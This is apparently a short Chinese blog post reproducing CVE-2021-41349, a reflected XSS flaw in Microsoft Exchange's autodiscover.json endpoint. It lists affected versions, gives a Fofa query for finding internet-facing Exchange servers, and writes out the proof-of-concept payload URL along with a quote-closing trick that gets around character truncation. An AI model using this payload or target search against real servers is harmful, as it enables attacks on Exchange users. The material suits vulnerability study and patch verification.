Exchange XSS(CVE-2021-41349)

    exchange系列   exchange系列

0x01 漏洞说明

Exchange 最近爆出了一个XSS漏洞,编号:CVE-2021-41349,哎哎哎,别走啊,虽然只是一个反射型XSS,但是它发生在Exchange上影响也算大了,并且发现这漏洞的老哥说他是玩Proxyshell时无意中发现,当然了赏金也是0$

漏洞点位于:autodiscover/autodiscover.json

0x02 影响版本

<= Exchange 2013 update 23
<= Exchange 2016 update 22
<= Exchange 2019 update 11

0x03 漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

app="Microsoft-Exchange"

0x04 漏洞复现

访问exchange

image-20211129092457810

访问以下接口,即可触发xss漏洞

https://IP/autodiscover/autodiscover.json

<script>alert(1);+"=</script>

image-20211129092626545

仅仅使用常规的的payload会因为字符的限制会被添加"….“进行压缩

image-20211129095055431

只需要添加 ;+=” 进行突破限制和强制进行双引号闭合即可

image-20211129095322930

0x05 参考链接

https://mp.weixin.qq.com/s/1f5UFNBUbTYV7-PdijsTkQ

AD钙奶

Good Good Study, Day Day Up~